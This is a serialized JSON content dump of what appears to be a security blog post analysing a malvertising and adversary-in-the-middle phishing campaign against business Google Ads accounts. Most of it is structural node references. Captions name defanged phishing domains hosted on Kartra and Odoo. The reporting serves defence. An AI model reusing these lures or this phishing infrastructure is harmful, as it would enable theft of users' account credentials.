5036,"content":55037},{},[55038],{"nodeType":173,"value":20962,"marks":55039,"data":55040},[],{},{"nodeType":178,"data":55042,"content":55043},{},[55044],{"nodeType":173,"value":20969,"marks":55045,"data":55046},[],{},{"nodeType":231,"data":55048,"content":55049},{},[],{"nodeType":169,"data":55051,"content":55052},{},[55053],{"nodeType":173,"value":20979,"marks":55054,"data":55056},[55055],{"type":370},{},{"nodeType":178,"data":55058,"content":55059},{},[55060,55063,55070],{"nodeType":173,"value":20987,"marks":55061,"data":55062},[],{},{"nodeType":186,"data":55064,"content":55065},{"uri":20992},[55066],{"nodeType":173,"value":20995,"marks":55067,"data":55069},[55068],{"type":194},{},{"nodeType":173,"value":21000,"marks":55071,"data":55072},[],{},{"nodeType":178,"data":55074,"content":55075},{},[55076],{"nodeType":173,"value":21007,"marks":55077,"data":55078},[],{},{"nodeType":178,"data":55080,"content":55081},{},[55082],{"nodeType":173,"value":21014,"marks":55083,"data":55084},[],{},{"nodeType":312,"data":55086,"content":55089},{"target":55087},{"sys":55088},{"id":21021,"type":317,"linkType":318},[],{"nodeType":231,"data":55091,"content":55092},{},[],{"nodeType":169,"data":55094,"content":55095},{},[55096],{"nodeType":173,"value":18605,"marks":55097,"data":55099},[55098],{"type":370},{},{"nodeType":178,"data":55101,"content":55102},{},[55103,55106,55113],{"nodeType":173,"value":21037,"marks":55104,"data":55105},[],{},{"nodeType":186,"data":55107,"content":55108},{"uri":21042},[55109],{"nodeType":173,"value":21045,"marks":55110,"data":55112},[55111],{"type":194},{},{"nodeType":173,"value":21050,"marks":55114,"data":55115},[],{},{"nodeType":178,"data":55117,"content":55118},{},[55119,55122,55129,55132,55139],{"nodeType":173,"value":1451,"marks":55120,"data":55121},[],{},{"nodeType":186,"data":55123,"content":55124},{"uri":1456},[55125],{"nodeType":173,"value":1459,"marks":55126,"data":55128},[55127],{"type":194},{},{"nodeType":173,"value":1464,"marks":55130,"data":55131},[],{},{"nodeType":186,"data":55133,"content":55134},{"uri":1469},[55135],{"nodeType":173,"value":1472,"marks":55136,"data":55138},[55137],{"type":194},{},{"nodeType":173,"value":1477,"marks":55140,"data":55141},[],{},{"nodeType":312,"data":55143,"content":55146},{"target":55144},{"sys":55145},{"id":20640,"type":317,"linkType":318},[],{"nodeType":178,"data":55148,"content":55149},{},[55150],{"nodeType":173,"value":37,"marks":55151,"data":55152},[],{},{"items":55154},[55155,55157],{"sys":55156,"name":509},{"id":508},{"sys":55158,"name":505},{"id":504},{"items":55160},[55161],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":55162},{"url":1496},{"items":55164},[55165],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":55166},{"url":1496},{"json":55168,"links":55503},{"data":55169,"content":55170,"nodeType":165},{},[55171,55178,55184,55189,55195,55225,55231,55236,55242,55247,55252,55257,55262,55267,55270,55277,55283,55289,55295,55302,55307,55323,55329,55345,55350,55353,55360,55366,55432,55438,55441,55448,55454,55460,55466,55492,55497],{"data":55172,"content":55173,"nodeType":169},{},[55174],{"data":55175,"marks":55176,"value":14096,"nodeType":173},{},[55177],{"type":370},{"data":55179,"content":55180,"nodeType":178},{},[55181],{"data":55182,"marks":55183,"value":41335,"nodeType":173},{},[],{"data":55185,"content":55188,"nodeType":312},{"target":55186},{"sys":55187},{"id":41340,"type":317,"linkType":318},[],{"data":55190,"content":55191,"nodeType":178},{},[55192],{"data":55193,"marks":55194,"value":41348,"nodeType":173},{},[],{"data":55196,"content":55197,"nodeType":250},{},[55198,55207,55216],{"data":55199,"content":55200,"nodeType":254},{},[55201],{"data":55202,"content":55203,"nodeType":178},{},[55204],{"data":55205,"marks":55206,"value":41361,"nodeType":173},{},[],{"data":55208,"content":55209,"nodeType":254},{},[55210],{"data":55211,"content":55212,"nodeType":178},{},[55213],{"data":55214,"marks":55215,"value":41371,"nodeType":173},{},[],{"data":55217,"content":55218,"nodeType":254},{},[55219],{"data":55220,"content":55221,"nodeType":178},{},[55222],{"data":55223,"marks":55224,"value":41381,"nodeType":173},{},[],{"data":55226,"content":55227,"nodeType":178},{},[55228],{"data":55229,"marks":55230,"value":41388,"nodeType":173},{},[],{"data":55232,"content":55235,"nodeType":312},{"target":55233},{"sys":55234},{"id":41393,"type":317,"linkType":318},[],{"data":55237,"content":55238,"nodeType":178},{},[55239],{"data":55240,"marks":55241,"value":41401,"nodeType":173},{},[],{"data":55243,"content":55246,"nodeType":312},{"target":55244},{"sys":55245},{"id":41406,"type":317,"linkType":318},[],{"data":55248,"content":55251,"nodeType":312},{"target":55249},{"sys":55250},{"id":41412,"type":317,"linkType":318},[],{"data":55253,"content":55256,"nodeType":312},{"target":55254},{"sys":55255},{"id":41418,"type":317,"linkType":318},[],{"data":55258,"content":55261,"nodeType":312},{"target":55259},{"sys":55260},{"id":41424,"type":317,"linkType":318},[],{"data":55263,"content":55266,"nodeType":312},{"target":55264},{"sys":55265},{"id":41430,"type":317,"linkType":318},[],{"data":55268,"content":55269,"nodeType":231},{},[],{"data":55271,"content":55272,"nodeType":169},{},[55273],{"data":55274,"marks":55275,"value":41442,"nodeType":173},{},[55276],{"type":370},{"data":55278,"content":55279,"nodeType":178},{},[55280],{"data":55281,"marks":55282,"value":41449,"nodeType":173},{},[],{"data":55284,"content":55285,"nodeType":178},{},[55286],{"data":55287,"marks":55288,"value":41456,"nodeType":173},{},[],{"data":55290,"content":55291,"nodeType":178},{},[55292],{"data":55293,"marks":55294,"value":41463,"nodeType":173},{},[],{"data":55296,"content":55297,"nodeType":178},{},[55298],{"data":55299,"marks":55300,"value":41471,"nodeType":173},{},[55301],{"type":370},{"data":55303,"content":55306,"nodeType":312},{"target":55304},{"sys":55305},{"id":41476,"type":317,"linkType":318},[],{"data":55308,"content":55309,"nodeType":178},{},[55310,55313,55320],{"data":55311,"marks":55312,"value":41484,"nodeType":173},{},[],{"data":55314,"content":55315,"nodeType":186},{"uri":1842},[55316],{"data":55317,"marks":55318,"value":1845,"nodeType":173},{},[55319],{"type":194},{"data":55321,"marks":55322,"value":41495,"nodeType":173},{},[],{"data":55324,"content":55325,"nodeType":178},{},[55326],{"data":55327,"marks":55328,"value":41502,"nodeType":173},{},[],{"data":55330,"content":55331,"nodeType":178},{},[55332,55335,55342],{"data":55333,"marks":55334,"value":41509,"nodeType":173},{},[],{"data":55336,"content":55337,"nodeType":186},{"uri":5002},[55338],{"data":55339,"marks":55340,"value":6811,"nodeType":173},{},[55341],{"type":194},{"data":55343,"marks":55344,"value":41073,"nodeType":173},{},[],{"data":55346,"content":55349,"nodeType":312},{"target":55347},{"sys":55348},{"id":8590,"type":317,"linkType":318},[],{"data":55351,"content":55352,"nodeType":231},{},[],{"data":55354,"content":55355,"nodeType":169},{},[55356],{"data":55357,"marks":55358,"value":8406,"nodeType":173},{},[55359],{"type":370},{"data":55361,"content":55362,"nodeType":178},{},[55363],{"data":55364,"marks":55365,"value":41541,"nodeType":173},{},[],{"data":55367,"content":55368,"nodeType":250},{},[55369,55378,55387,55396,55405,55414,55423],{"data":55370,"content":55371,"nodeType":254},{},[55372],{"data":55373,"content":55374,"nodeType":178},{},[55375],{"data":55376,"marks":55377,"value":41554,"nodeType":173},{},[],{"data":55379,"content":55380,"nodeType":254},{},[55381],{"data":55382,"content":55383,"nodeType":178},{},[55384],{"data":55385,"marks":55386,"value":41564,"nodeType":173},{},[],{"data":55388,"content":55389,"nodeType":254},{},[55390],{"data":55391,"content":55392,"nodeType":178},{},[55393],{"data":55394,"marks":55395,"value":41574,"nodeType":173},{},[],{"data":55397,"content":55398,"nodeType":254},{},[55399],{"data":55400,"content":55401,"nodeType":178},{},[55402],{"data":55403,"marks":55404,"value":41584,"nodeType":173},{},[],{"data":55406,"content":55407,"nodeType":254},{},[55408],{"data":55409,"content":55410,"nodeType":178},{},[55411],{"data":55412,"marks":55413,"value":41594,"nodeType":173},{},[],{"data":55415,"content":55416,"nodeType":254},{},[55417],{"data":55418,"content":55419,"nodeType":178},{},[55420],{"data":55421,"marks":55422,"value":41604,"nodeType":173},{},[],{"data":55424,"content":55425,"nodeType":254},{},[55426],{"data":55427,"content":55428,"nodeType":178},{},[55429],{"data":55430,"marks":55431,"value":41614,"nodeType":173},{},[],{"data":55433,"content":55434,"nodeType":178},{},[55435],{"data":55436,"marks":55437,"value":41621,"nodeType":173},{},[],{"data":55439,"content":55440,"nodeType":231},{},[],{"data":55442,"content":55443,"nodeType":169},{},[55444],{"data":55445,"marks":55446,"value":8517,"nodeType":173},{},[55447],{"type":370},{"data":55449,"content":55450,"nodeType":178},{},[55451],{"data":55452,"marks":55453,"value":41638,"nodeType":173},{},[],{"data":55455,"content":55456,"nodeType":178},{},[55457],{"data":55458,"marks":55459,"value":41645,"nodeType":173},{},[],{"data":55461,"content":55462,"nodeType":178},{},[55463],{"data":55464,"marks":55465,"value":14340,"nodeType":173},{},[],{"data":55467,"content":55468,"nodeType":178},{},[55469,55472,55479,55482,55489],{"data":55470,"marks":55471,"value":1451,"nodeType":173},{},[],{"data":55473,"content":55474,"nodeType":186},{"uri":1456},[55475],{"data":55476,"marks":55477,"value":1459,"nodeType":173},{},[55478],{"type":194},{"data":55480,"marks":55481,"value":1464,"nodeType":173},{},[],{"data":55483,"content":55484,"nodeType":186},{"uri":1469},[55485],{"data":55486,"marks":55487,"value":1472,"nodeType":173},{},[55488],{"type":194},{"data":55490,"marks":55491,"value":1477,"nodeType":173},{},[],{"data":55493,"content":55496,"nodeType":312},{"target":55494},{"sys":55495},{"id":8590,"type":317,"linkType":318},[],{"data":55498,"content":55499,"nodeType":178},{},[55500],{"data":55501,"marks":55502,"value":37,"nodeType":173},{},[],{"entries":55504},{"hyperlink":55505,"inline":55506,"block":55507},[],[],[55508,55522,55527,55531,55537,55541,55546,55551,55589],{"sys":55509,"__typename":5311,"content":55510,"name":55521,"title":118},{"id":41340},{"json":55511},{"data":55512,"content":55513,"nodeType":165},{},[55514],{"data":55515,"content":55516,"nodeType":178},{},[55517],{"data":55518,"marks":55519,"value":55520,"nodeType":173},{},[],"We regularly come across malvertising attacks where attackers take out ads against commonly used apps and websites to intercept users Googling for the login URL rather than accessing it from a bookmark. If you’re not on guard against possible malicious ads, it can be easy to miss that you’re not accessing the legitimate URL.","Google Malvertising Insight Box 1",{"sys":55523,"__typename":5345,"title":55524,"caption":55524,"layoutMode":118,"file":55525},{"id":41393},"When we came to investigate, the site had already been taken offline.",{"url":55526,"width":5358,"height":42838},"https://images.ctfassets.net/y1cdw1ablpvd/3LePBDurx90LO3jhnBH5Ua/d704a7650bfd9f7b98e2945bb6dd509c/image1.png",{"sys":55528,"__typename":5434,"title":55529,"arcadeDemoUrl":55530,"playText":5437},{"id":41406},"Google Malvertising Attack Demo","https://demo.arcade.software/LHB2RWbijgTTPTCxRPBm?embed",{"sys":55532,"__typename":5345,"title":55533,"caption":55533,"layoutMode":118,"file":55534},{"id":41412},"Timeline from one of the detections, showing hxxps://adsloginaccess.kartra.com being used as a redirect before serving up the phishing site at hxxps://adsgooglie.odoo.com",{"url":55535,"width":5358,"height":55536},"https://images.ctfassets.net/y1cdw1ablpvd/3xYelIFp9bS9xEnE6TNpgG/25519667c624cc76a6bf1bdbb279d60a/image2.png",1551,{"sys":55538,"__typename":5345,"title":55539,"caption":55539,"layoutMode":118,"file":55540},{"id":41418},"Google Search returning a top ad for a page impersonating the Google Ads login page, hosted on Odoo.",{"url":42837,"width":5358,"height":42838},{"sys":55542,"__typename":5345,"title":55543,"caption":55543,"layoutMode":118,"file":55544},{"id":41424},"Phishing site landing page impersonating the real Google Ads landing page.",{"url":55545,"width":5358,"height":42838},"https://images.ctfassets.net/y1cdw1ablpvd/5fnOP14PejZqJqg9l29xYV/c6f3a175aa367ed7bd222f05352646ee/image5.png",{"sys":55547,"__typename":5345,"title":55548,"caption":55548,"layoutMode":118,"file":55549},{"id":41430},"AiTM phishing page hosted on hxxps://ads-o.odoo.com",{"url":55550,"width":5358,"height":42838},"https://images.ctfassets.net/y1cdw1ablpvd/6VzjvK3FE9mVoYOzx8FrXk/af3a997c49dfb0d5cbf231d2006c7d5f/image3.png",{"sys":55552,"__typename":5311,"content":55553,"name":55588,"title":118},{"id":41476},{"json":55554},{"nodeType":165,"data":55555,"content":55556},{},[55557],{"nodeType":178,"data":55558,"content":55559},{},[55560,55564,55572,55576,55585],{"nodeType":173,"value":55561,"marks":55562,"data":55563},"Campaigns targeting Google accounts specifically are becoming increasingly common. We also identified a ",[],{},{"nodeType":186,"data":55565,"content":55567},{"uri":55566},"/blog/uncovering-a-calendly-themed-phishing-campaign",[55568],{"nodeType":173,"value":55569,"marks":55570,"data":55571},"campaign targeting Google Ad accounts via highly targeted phishing emails",[],{},{"nodeType":173,"value":55573,"marks":55574,"data":55575}," around the same time that this attack was identified. Similarly, we’ve also blogged about ",[],{},{"nodeType":186,"data":55577,"content":55579},{"uri":55578},"/blog/investigating-a-recent-malvertising-campaign-targeting-onfido-customers",[55580],{"nodeType":173,"value":55581,"marks":55582,"data":55584},"Scattered Spider-linked malvertising campaigns earlier this year",[55583],{"type":194},{},{"nodeType":173,"value":1477,"marks":55586,"data":55587},[],{},"Google Malvertising Insight Box 2",{"sys":55590,"__typename":15269,"type":15270,"ctaText":49208,"buttonLabel":15277,"buttonColour":15273,"buttonUrl":49143},{"id":8590},"content:blog:analysing-a-malvertising-attack-targeting-business-google-accounts.json","blog/analysing-a-malvertising-attack-targeting-business-google-accounts.json","blog/analysing-a-malvertising-attack-targeting-business-google-accounts",{"_path":55566,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":55595,"ogImage":118,"summary":55597,"title":42282,"subtitle":118,"metaTitle":55608,"synopsis":42283,"hashTags":118,"publishedDate":41691,"slug":42284,"tagsCollection":55609,"relatedBlogPostsCollection":55615,"authorsCollection":57276,"content":57280,"_id":57962,"_type":5439,"_source":5440,"_file":57963,"_stem":57964,"_extension":5439},{"id":41705,"publishedAt":55596},"2025-12-02T15:34:00.308Z",{"json":55598},{"data":55599,"content":55600,"nodeType":165},{},[55601],{"data":55602,"content":55603,"nodeType":178},{},[55604],{"data":55605,"marks":55606,"value":55607,"nodeType":173},{},[],"We recently investigated a large-scale phishing campaign that demonstrated a number of advanced detection evasion techniques and social engineering tactics, specifically targeting accounts used to manage business ads. Here’s what you need to know. ","Uncovering a Calendly-themed phishing campaign ",{"items":55610},[55611,55613],{"sys":55612,"name":505},{"id":504},{"sys":55614,"name":509},{"id":508},{"items":55616},[55617,56100,56928],{"__typename":1528,"sys":55618,"content":55619,"title":46292,"synopsis":50301,"hashTags":118,"publishedDate":50302,"slug":46293,"tagsCollection":56090,"authorsCollection":56096},{"id":24196},{"json":55620},{"nodeType":165,"data":55621,"content":55622},{},[55623,55629,55635,55661,55667,55673,55679,55682,55689,55705,55711,55716,55722,55727,55733,55738,55744,55749,55755,55760,55766,55772,55777,55780,55787,55803,55809,55815,55820,55836,55843,55859,55866,55882,55888,55893,55919,55926,55952,55959,55975,55980,55983,55990,56006,56011,56014,56021,56027,56033,56036,56043,56049,56055,56079,56084],{"nodeType":178,"data":55624,"content":55625},{},[55626],{"nodeType":173,"value":49766,"marks":55627,"data":55628},[],{},{"nodeType":178,"data":55630,"content":55631},{},[55632],{"nodeType":173,"value":39774,"marks":55633,"data":55634},[],{},{"nodeType":178,"data":55636,"content":55637},{},[55638,55641,55648,55651,55658],{"nodeType":173,"value":39781,"marks":55639,"data":55640},[],{},{"nodeType":186,"data":55642,"content":55643},{"uri":49783},[55644],{"nodeType":173,"value":39789,"marks":55645,"data":55647},[55646],{"type":194},{},{"nodeType":173,"value":9534,"marks":55649,"data":55650},[],{},{"nodeType":186,"data":55652,"content":55653},{"uri":6820},[55654],{"nodeType":173,"value":8157,"marks":55655,"data":55657},[55656],{"type":194},{},{"nodeType":173,"value":49800,"marks":55659,"data":55660},[],{},{"nodeType":178,"data":55662,"content":55663},{},[55664],{"nodeType":173,"value":49807,"marks":55665,"data":55666},[],{},{"nodeType":178,"data":55668,"content":55669},{},[55670],{"nodeType":173,"value":49814,"marks":55671,"data":55672},[],{},{"nodeType":178,"data":55674,"content":55675},{},[55676],{"nodeType":173,"value":49821,"marks":55677,"data":55678},[],{},{"nodeType":231,"data":55680,"content":55681},{},[],{"nodeType":169,"data":55683,"content":55684},{},[55685],{"nodeType":173,"value":49831,"marks":55686,"data":55688},[55687],{"type":370},{},{"nodeType":178,"data":55690,"content":55691},{},[55692,55695,55702],{"nodeType":173,"value":49839,"marks":55693,"data":55694},[],{},{"nodeType":186,"data":55696,"content":55697},{"uri":49844},[55698],{"nodeType":173,"value":49847,"marks":55699,"data":55701},[55700],{"type":194},{},{"nodeType":173,"value":49852,"marks":55703,"data":55704},[],{},{"nodeType":178,"data":55706,"content":55707},{},[55708],{"nodeType":173,"value":49859,"marks":55709,"data":55710},[],{},{"nodeType":312,"data":55712,"content":55715},{"target":55713},{"sys":55714},{"id":49866,"type":317,"linkType":318},[],{"nodeType":178,"data":55717,"content":55718},{},[55719],{"nodeType":173,"value":49872,"marks":55720,"data":55721},[],{},{"nodeType":312,"data":55723,"content":55726},{"target":55724},{"sys":55725},{"id":49879,"type":317,"linkType":318},[],{"nodeType":178,"data":55728,"content":55729},{},[55730],{"nodeType":173,"value":49885,"marks":55731,"data":55732},[],{},{"nodeType":312,"data":55734,"content":55737},{"target":55735},{"sys":55736},{"id":49892,"type":317,"linkType":318},[],{"nodeType":178,"data":55739,"content":55740},{},[55741],{"nodeType":173,"value":49898,"marks":55742,"data":55743},[],{},{"nodeType":312,"data":55745,"content":55748},{"target":55746},{"sys":55747},{"id":49905,"type":317,"linkType":318},[],{"nodeType":178,"data":55750,"content":55751},{},[55752],{"nodeType":173,"value":49911,"marks":55753,"data":55754},[],{},{"nodeType":312,"data":55756,"content":55759},{"target":55757},{"sys":55758},{"id":49918,"type":317,"linkType":318},[],{"nodeType":178,"data":55761,"content":55762},{},[55763],{"nodeType":173,"value":49924,"marks":55764,"data":55765},[],{},{"nodeType":178,"data":55767,"content":55768},{},[55769],{"nodeType":173,"value":49931,"marks":55770,"data":55771},[],{},{"nodeType":312,"data":55773,"content":55776},{"target":55774},{"sys":55775},{"id":49938,"type":317,"linkType":318},[],{"nodeType":231,"data":55778,"content":55779},{},[],{"nodeType":169,"data":55781,"content":55782},{},[55783],{"nodeType":173,"value":49947,"marks":55784,"data":55786},[55785],{"type":370},{},{"nodeType":178,"data":55788,"content":55789},{},[55790,55793,55800],{"nodeType":173,"value":49955,"marks":55791,"data":55792},[],{},{"nodeType":186,"data":55794,"content":55795},{"uri":49960},[55796],{"nodeType":173,"value":49963,"marks":55797,"data":55799},[55798],{"type":194},{},{"nodeType":173,"value":49968,"marks":55801,"data":55802},[],{},{"nodeType":178,"data":55804,"content":55805},{},[55806],{"nodeType":173,"value":49975,"marks":55807,"data":55808},[],{},{"nodeType":178,"data":55810,"content":55811},{},[55812],{"nodeType":173,"value":49982,"marks":55813,"data":55814},[],{},{"nodeType":312,"data":55816,"content":55819},{"target":55817},{"sys":55818},{"id":49989,"type":317,"linkType":318},[],{"nodeType":178,"data":55821,"content":55822},{},[55823,55826,55833],{"nodeType":173,"value":49995,"marks":55824,"data":55825},[],{},{"nodeType":186,"data":55827,"content":55828},{"uri":6820},[55829],{"nodeType":173,"value":8157,"marks":55830,"data":55832},[55831],{"type":194},{},{"nodeType":173,"value":50006,"marks":55834,"data":55835},[],{},{"nodeType":235,"data":55837,"content":55838},{},[55839],{"nodeType":173,"value":50013,"marks":55840,"data":55842},[55841],{"type":370},{},{"nodeType":178,"data":55844,"content":55845},{},[55846,55849,55856],{"nodeType":173,"value":50021,"marks":55847,"data":55848},[],{},{"nodeType":186,"data":55850,"content":55851},{"uri":50026},[55852],{"nodeType":173,"value":50029,"marks":55853,"data":55855},[55854],{"type":194},{},{"nodeType":173,"value":50034,"marks":55857,"data":55858},[],{},{"nodeType":235,"data":55860,"content":55861},{},[55862],{"nodeType":173,"value":50041,"marks":55863,"data":55865},[55864],{"type":370},{},{"nodeType":178,"data":55867,"content":55868},{},[55869,55872,55879],{"nodeType":173,"value":37,"marks":55870,"data":55871},[],{},{"nodeType":186,"data":55873,"content":55874},{"uri":7853},[55875],{"nodeType":173,"value":50055,"marks":55876,"data":55878},[55877],{"type":194},{},{"nodeType":173,"value":50060,"marks":55880,"data":55881},[],{},{"nodeType":178,"data":55883,"content":55884},{},[55885],{"nodeType":173,"value":50067,"marks":55886,"data":55887},[],{},{"nodeType":312,"data":55889,"content":55892},{"target":55890},{"sys":55891},{"id":50074,"type":317,"linkType":318},[],{"nodeType":178,"data":55894,"content":55895},{},[55896,55899,55906,55909,55916],{"nodeType":173,"value":50080,"marks":55897,"data":55898},[],{},{"nodeType":186,"data":55900,"content":55901},{"uri":42062},[55902],{"nodeType":173,"value":50087,"marks":55903,"data":55905},[55904],{"type":194},{},{"nodeType":173,"value":50092,"marks":55907,"data":55908},[],{},{"nodeType":186,"data":55910,"content":55911},{"uri":50097},[55912],{"nodeType":173,"value":50100,"marks":55913,"data":55915},[55914],{"type":194},{},{"nodeType":173,"value":50105,"marks":55917,"data":55918},[],{},{"nodeType":235,"data":55920,"content":55921},{},[55922],{"nodeType":173,"value":50112,"marks":55923,"data":55925},[55924],{"type":370},{},{"nodeType":178,"data":55927,"content":55928},{},[55929,55932,55939,55942,55949],{"nodeType":173,"value":50120,"marks":55930,"data":55931},[],{},{"nodeType":186,"data":55933,"content":55934},{"uri":50125},[55935],{"nodeType":173,"value":50128,"marks":55936,"data":55938},[55937],{"type":194},{},{"nodeType":173,"value":50133,"marks":55940,"data":55941},[],{},{"nodeType":186,"data":55943,"content":55944},{"uri":50138},[55945],{"nodeType":173,"value":50141,"marks":55946,"data":55948},[55947],{"type":194},{},{"nodeType":173,"value":50146,"marks":55950,"data":55951},[],{},{"nodeType":235,"data":55953,"content":55954},{},[55955],{"nodeType":173,"value":50153,"marks":55956,"data":55958},[55957],{"type":370},{},{"nodeType":178,"data":55960,"content":55961},{},[55962,55965,55972],{"nodeType":173,"value":50161,"marks":55963,"data":55964},[],{},{"nodeType":186,"data":55966,"content":55967},{"uri":50166},[55968],{"nodeType":173,"value":50169,"marks":55969,"data":55971},[55970],{"type":194},{},{"nodeType":173,"value":50174,"marks":55973,"data":55974},[],{},{"nodeType":312,"data":55976,"content":55979},{"target":55977},{"sys":55978},{"id":8590,"type":317,"linkType":318},[],{"nodeType":231,"data":55981,"content":55982},{},[],{"nodeType":169,"data":55984,"content":55985},{},[55986],{"nodeType":173,"value":50189,"marks":55987,"data":55989},[55988],{"type":370},{},{"nodeType":178,"data":55991,"content":55992},{},[55993,55996,56003],{"nodeType":173,"value":50197,"marks":55994,"data":55995},[],{},{"nodeType":186,"data":55997,"content":55998},{"uri":50202},[55999],{"nodeType":173,"value":50205,"marks":56000,"data":56002},[56001],{"type":194},{},{"nodeType":173,"value":50210,"marks":56004,"data":56005},[],{},{"nodeType":312,"data":56007,"content":56010},{"target":56008},{"sys":56009},{"id":50217,"type":317,"linkType":318},[],{"nodeType":231,"data":56012,"content":56013},{},[],{"nodeType":169,"data":56015,"content":56016},{},[56017],{"nodeType":173,"value":40632,"marks":56018,"data":56020},[56019],{"type":370},{},{"nodeType":178,"data":56022,"content":56023},{},[56024],{"nodeType":173,"value":50233,"marks":56025,"data":56026},[],{},{"nodeType":178,"data":56028,"content":56029},{},[56030],{"nodeType":173,"value":50240,"marks":56031,"data":56032},[],{},{"nodeType":231,"data":56034,"content":56035},{},[],{"nodeType":169,"data":56037,"content":56038},{},[56039],{"nodeType":173,"value":1422,"marks":56040,"data":56042},[56041],{"type":370},{},{"nodeType":178,"data":56044,"content":56045},{},[56046],{"nodeType":173,"value":42238,"marks":56047,"data":56048},[],{},{"nodeType":178,"data":56050,"content":56051},{},[56052],{"nodeType":173,"value":50263,"marks":56053,"data":56054},[],{},{"nodeType":178,"data":56056,"content":56057},{},[56058,56061,56067,56070,56076],{"nodeType":173,"value":1451,"marks":56059,"data":56060},[],{},{"nodeType":186,"data":56062,"content":56063},{"uri":1456},[56064],{"nodeType":173,"value":1459,"marks":56065,"data":56066},[],{},{"nodeType":173,"value":1464,"marks":56068,"data":56069},[],{},{"nodeType":186,"data":56071,"content":56072},{"uri":1469},[56073],{"nodeType":173,"value":1472,"marks":56074,"data":56075},[],{},{"nodeType":173,"value":1477,"marks":56077,"data":56078},[],{},{"nodeType":312,"data":56080,"content":56083},{"target":56081},{"sys":56082},{"id":8590,"type":317,"linkType":318},[],{"nodeType":178,"data":56085,"content":56086},{},[56087],{"nodeType":173,"value":37,"marks":56088,"data":56089},[],{},{"items":56091},[56092,56094],{"sys":56093,"name":505},{"id":504},{"sys":56095,"name":509},{"id":508},{"items":56097},[56098],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":56099},{"url":1496},{"__typename":1528,"sys":56101,"content":56102,"title":1480,"synopsis":1481,"hashTags":118,"publishedDate":1482,"slug":1483,"tagsCollection":56918,"authorsCollection":56924},{"id":519},{"json":56103},{"nodeType":165,"data":56104,"content":56105},{},[56106,56112,56118,56124,56127,56134,56140,56146,56151,56157,56162,56178,56184,56194,56197,56204,56210,56223,56229,56239,56244,56247,56254,56261,56266,56274,56290,56298,56304,56312,56327,56335,56341,56349,56375,56383,56389,56397,56413,56418,56426,56432,56440,56473,56476,56483,56491,56507,56515,56521,56529,56555,56560,56568,56574,56579,56582,56589,56597,56603,56654,56659,56662,56669,56677,56683,56688,56691,56698,56704,56710,56770,56776,56831,56837,56840,56847,56853,56859,56864,56867,56874,56880,56886,56892],{"nodeType":178,"data":56107,"content":56108},{},[56109],{"nodeType":173,"value":528,"marks":56110,"data":56111},[],{},{"nodeType":178,"data":56113,"content":56114},{},[56115],{"nodeType":173,"value":535,"marks":56116,"data":56117},[],{},{"nodeType":178,"data":56119,"content":56120},{},[56121],{"nodeType":173,"value":542,"marks":56122,"data":56123},[],{},{"nodeType":231,"data":56125,"content":56126},{},[],{"nodeType":169,"data":56128,"content":56129},{},[56130],{"nodeType":173,"value":552,"marks":56131,"data":56133},[56132],{"type":370},{},{"nodeType":178,"data":56135,"content":56136},{},[56137],{"nodeType":173,"value":560,"marks":56138,"data":56139},[],{},{"nodeType":178,"data":56141,"content":56142},{},[56143],{"nodeType":173,"value":567,"marks":56144,"data":56145},[],{},{"nodeType":312,"data":56147,"content":56150},{"target":56148},{"sys":56149},{"id":574,"type":317,"linkType":318},[],{"nodeType":178,"data":56152,"content":56153},{},[56154],{"nodeType":173,"value":580,"marks":56155,"data":56156},[],{},{"nodeType":312,"data":56158,"content":56161},{"target":56159},{"sys":56160},{"id":587,"type":317,"linkType":318},[],{"nodeType":178,"data":56163,"content":56164},{},[56165,56168,56175],{"nodeType":173,"value":593,"marks":56166,"data":56167},[],{},{"nodeType":186,"data":56169,"content":56170},{"uri":598},[56171],{"nodeType":173,"value":601,"marks":56172,"data":56174},[56173],{"type":194},{},{"nodeType":173,"value":606,"marks":56176,"data":56177},[],{},{"nodeType":178,"data":56179,"content":56180},{},[56181],{"nodeType":173,"value":613,"marks":56182,"data":56183},[],{},{"nodeType":178,"data":56185,"content":56186},{},[56187,56190],{"nodeType":173,"value":620,"marks":56188,"data":56189},[],{},{"nodeType":173,"value":624,"marks":56191,"data":56193},[56192],{"type":370},{},{"nodeType":231,"data":56195,"content":56196},{},[],{"nodeType":169,"data":56198,"content":56199},{},[56200],{"nodeType":173,"value":635,"marks":56201,"data":56203},[56202],{"type":370},{},{"nodeType":178,"data":56205,"content":56206},{},[56207],{"nodeType":173,"value":643,"marks":56208,"data":56209},[],{},{"nodeType":178,"data":56211,"content":56212},{},[56213,56216,56220],{"nodeType":173,"value":650,"marks":56214,"data":56215},[],{},{"nodeType":173,"value":654,"marks":56217,"data":56219},[56218],{"type":370},{},{"nodeType":173,"value":659,"marks":56221,"data":56222},[],{},{"nodeType":178,"data":56224,"content":56225},{},[56226],{"nodeType":173,"value":666,"marks":56227,"data":56228},[],{},{"nodeType":178,"data":56230,"content":56231},{},[56232,56235],{"nodeType":173,"value":673,"marks":56233,"data":56234},[],{},{"nodeType":173,"value":677,"marks":56236,"data":56238},[56237],{"type":370},{},{"nodeType":312,"data":56240,"content":56243},{"target":56241},{"sys":56242},{"id":685,"type":317,"linkType":318},[],{"nodeType":231,"data":56245,"content":56246},{},[],{"nodeType":169,"data":56248,"content":56249},{},[56250],{"nodeType":173,"value":694,"marks":56251,"data":56253},[56252],{"type":370},{},{"nodeType":235,"data":56255,"content":56256},{},[56257],{"nodeType":173,"value":702,"marks":56258,"data":56260},[56259],{"type":370},{},{"nodeType":312,"data":56262,"content":56265},{"target":56263},{"sys":56264},{"id":710,"type":317,"linkType":318},[],{"nodeType":178,"data":56267,"content":56268},{},[56269],{"nodeType":173,"value":716,"marks":56270,"data":56273},[56271,56272],{"type":370},{"type":194},{},{"nodeType":178,"data":56275,"content":56276},{},[56277,56280,56287],{"nodeType":173,"value":725,"marks":56278,"data":56279},[],{},{"nodeType":186,"data":56281,"content":56282},{"uri":730},[56283],{"nodeType":173,"value":733,"marks":56284,"data":56286},[56285],{"type":194},{},{"nodeType":173,"value":738,"marks":56288,"data":56289},[],{},{"nodeType":178,"data":56291,"content":56292},{},[56293],{"nodeType":173,"value":745,"marks":56294,"data":56297},[56295,56296],{"type":370},{"type":194},{},{"nodeType":178,"data":56299,"content":56300},{},[56301],{"nodeType":173,"value":754,"marks":56302,"data":56303},[],{},{"nodeType":178,"data":56305,"content":56306},{},[56307],{"nodeType":173,"value":761,"marks":56308,"data":56311},[56309,56310],{"type":370},{"type":194},{},{"nodeType":178,"data":56313,"content":56314},{},[56315,56318,56324],{"nodeType":173